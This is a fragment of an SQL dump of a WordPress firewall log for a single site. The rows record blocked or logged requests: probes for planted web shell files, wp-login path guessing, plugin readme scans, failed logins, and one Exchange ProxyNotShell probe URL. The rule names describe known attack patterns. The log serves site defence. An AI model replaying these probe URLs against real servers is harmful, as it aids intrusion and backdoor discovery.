Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy9pUjdTenJzT1VFUC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134375,1700090112.751834,1700090112.742700,0x00000000000000000000FFFF9CF91C20,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134365,1700085539.926830,1700085539.918000,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134379,1700105763.347238,1700105763.335000,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/download-monitor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZC1tb25pdG9yL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZC1tb25pdG9yL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134366,1700085534.460990,1700085534.451700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/js/widgets/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMvaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134367,1700085529.309217,1700085529.299900,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134368,1700085524.958436,1700085524.949100,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/images/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9pUjdTenJzT1VFUC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134384,1700126290.520691,1700126290.513000,0x00000000000000000000FFFF6BAAEC1F,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(134374,1700090074.438776,1700090074.416600,0x00000000000000000000FFFF9CF91C20,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134369,1700085520.561515,1700085520.552700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/upgrade/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBncmFkZS9pUjdTenJzT1VFUC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134370,1700085516.871891,1700085516.849500,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L2lSN1N6cnNPVUVQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134380,1700105763.346892,1700105763.335000,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/download-monitor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZC1tb25pdG9yL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZC1tb25pdG9yL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134373,1700089600.835305,1700089600.831600,0x00000000000000000000FFFFB89A8B11,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/wp-file-manager/readme.txt',NULL,'SiteLockSpider [en] (WinNT; I ;Nav)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3BsdWdpbnMvd3AtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvd3AtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134371,1700085501.874102,1700085501.865300,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2lSN1N6cnNPVUVQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134372,1700089600.835751,1700089600.831600,0x00000000000000000000FFFFB89A8B11,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/wp-file-manager/readme.txt',NULL,'SiteLockSpider [en] (WinNT; I ;Nav)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvd3AtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvd3AtZmlsZS1tYW5hZ2VyL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134387,0.000000,1700130403.209079,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134386,0.000000,1700126748.818092,0x00000000000000000000FFFFCDB97ED6,0,200,0,0,0,'https://www.eckankar-colorado.org//wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134393,1700133297.094712,1700133297.085300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/admin.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134427,1700136289.142384,1700136289.120400,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(134394,1700133292.508613,1700133292.499300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134443,1700140471.182755,1700140471.175100,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/mstore-api/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tc3RvcmUtYXBpL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134395,1700133288.531626,1700133288.522900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134396,1700133283.795503,1700133283.758300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134426,1700136289.149878,1700136289.114900,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134397,1700133400.847328,1700133400.836800,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/certificates/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NlcnRpZmljYXRlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134398,1700133395.316471,1700133395.306900,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134399,1700133389.678448,1700133389.669700,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/languages/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbGFuZ3VhZ2VzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134400,1700133383.290057,1700133383.281300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/4pric.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzRwcmljLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134446,0.000000,1700142029.625147,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134447,1700142644.742335,1700142644.720100,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134425,1700136289.174998,1700136289.153300,0x00000000000000000000FFFF68FAEE68,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134401,1700133376.977496,1700133376.967500,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/bala.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 